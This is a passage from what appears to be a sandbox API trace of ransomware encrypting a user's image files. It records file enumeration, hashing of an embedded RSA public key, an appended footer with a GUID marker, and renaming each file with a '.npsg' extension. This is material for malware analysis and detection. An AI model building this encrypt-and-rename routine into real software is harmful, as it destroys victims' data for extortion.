lpOverlapped=0x0) returned 1 [0239.115] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.115] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.115] CloseHandle (hObject=0x644) returned 1 [0239.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x3393a30 [0239.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8b0) returned 0x3b88cd0 [0239.120] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\39MviVki.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\39mvivki.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\39MviVki.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\39mvivki.png.npsg")) returned 1 [0239.122] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6f5d070, ftCreationTime.dwHighDateTime=0x1d5b9be, ftLastAccessTime.dwLowDateTime=0x1f72fa80, ftLastAccessTime.dwHighDateTime=0x1d5bdef, ftLastWriteTime.dwLowDateTime=0x1f72fa80, ftLastWriteTime.dwHighDateTime=0x1d5bdef, nFileSizeHigh=0x0, nFileSizeLow=0x8ca2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cLulDnijTiFt7bi.gif", cAlternateFileName="CLULDN~1.GIF")) returned 1 [0239.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.122] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.122] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\cLulDnijTiFt7bi.gif") returned=".gif" [0239.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\cLulDnijTiFt7bi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\cluldnijtift7bi.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.123] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=36002) returned 1 [0239.123] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.126] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8c7c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.126] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.127] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.128] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x8ca2, lpOverlapped=0x0) returned 1 [0239.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.128] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.128] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.128] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.129] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.129] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.129] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.129] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.129] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.130] GetLastError () returned 0x0 [0239.130] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.130] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.130] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.130] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.130] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.130] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.130] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.131] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x8ca2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.131] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.131] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.131] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.131] CloseHandle (hObject=0x644) returned 1 [0239.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.136] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x3b88cd0 [0239.136] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\cLulDnijTiFt7bi.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\cluldnijtift7bi.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\cLulDnijTiFt7bi.gif.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\cluldnijtift7bi.gif.npsg")) returned 1 [0239.138] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ddfb320, ftCreationTime.dwHighDateTime=0x1d5c571, ftLastAccessTime.dwLowDateTime=0x44f77170, ftLastAccessTime.dwHighDateTime=0x1d5b7ad, ftLastWriteTime.dwLowDateTime=0x44f77170, ftLastWriteTime.dwHighDateTime=0x1d5b7ad, nFileSizeHigh=0x0, nFileSizeLow=0x59b0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nH0cFqJ3za-W9YlN1.png", cAlternateFileName="NH0CFQ~1.PNG")) returned 1 [0239.138] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.139] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.139] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\nH0cFqJ3za-W9YlN1.png") returned=".png" [0239.139] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\nH0cFqJ3za-W9YlN1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\nh0cfqj3za-w9yln1.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.139] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=22960) returned 1 [0239.139] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.142] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x598a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.142] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.144] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x59b0, lpOverlapped=0x0) returned 1 [0239.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.145] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.145] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.145] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.146] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.146] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.147] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.147] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.147] GetLastError () returned 0x0 [0239.147] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.147] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.147] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.147] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.147] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.147] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.148] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x59b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.148] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.148] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.148] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.148] CloseHandle (hObject=0x644) returned 1 [0239.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b88cd0 [0239.152] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\nH0cFqJ3za-W9YlN1.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\nh0cfqj3za-w9yln1.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\nH0cFqJ3za-W9YlN1.png.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\nh0cfqj3za-w9yln1.png.npsg")) returned 1 [0239.157] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c0d2310, ftCreationTime.dwHighDateTime=0x1d5c3d0, ftLastAccessTime.dwLowDateTime=0xe5308760, ftLastAccessTime.dwHighDateTime=0x1d5be58, ftLastWriteTime.dwLowDateTime=0xe5308760, ftLastWriteTime.dwHighDateTime=0x1d5be58, nFileSizeHigh=0x0, nFileSizeLow=0x167ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WHsE_LScbPcalufoZ3iC.gif", cAlternateFileName="WHSE_L~1.GIF")) returned 1 [0239.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e8f0 [0239.157] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xd6) returned 0x708b30 [0239.157] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\WHsE_LScbPcalufoZ3iC.gif") returned=".gif" [0239.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\WHsE_LScbPcalufoZ3iC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\whse_lscbpcalufoz3ic.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0239.158] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=92110) returned 1 [0239.158] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0239.161] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x167a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.161] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0239.163] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0239.163] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x167ce, lpOverlapped=0x0) returned 1 [0239.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.164] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0239.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.164] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0239.164] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a6e8) returned 1 [0239.165] CryptCreateHash (in: hProv=0x67a6e8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0239.165] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0239.165] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0239.165] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0239.166] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0239.166] GetLastError () returned 0x0 [0239.166] CryptDestroyHash (hHash=0x33f0408) returned 1 [0239.166] CryptReleaseContext (hProv=0x67a6e8, dwFlags=0x0) returned 1 [0239.166] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0239.166] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0239.166] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0239.166] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0239.167] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90a38 [0239.167] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0239.168] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x167ce, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0239.168] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0239.168] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0239.168] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0239.168] CloseHandle (hObject=0x644) returned 1 [0239.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a87c0 [0239.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8d0) returned 0x3b89cd0 [0239.180] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 wBKbSvaIoJ2e\\lEiN6S__d\\WHsE_LScbPcalufoZ3iC.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\2dvgfw2 wbkbsvaioj2e\\lein6s__d\\whse_lscbpcalufoz3ic.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\2DVGfW2 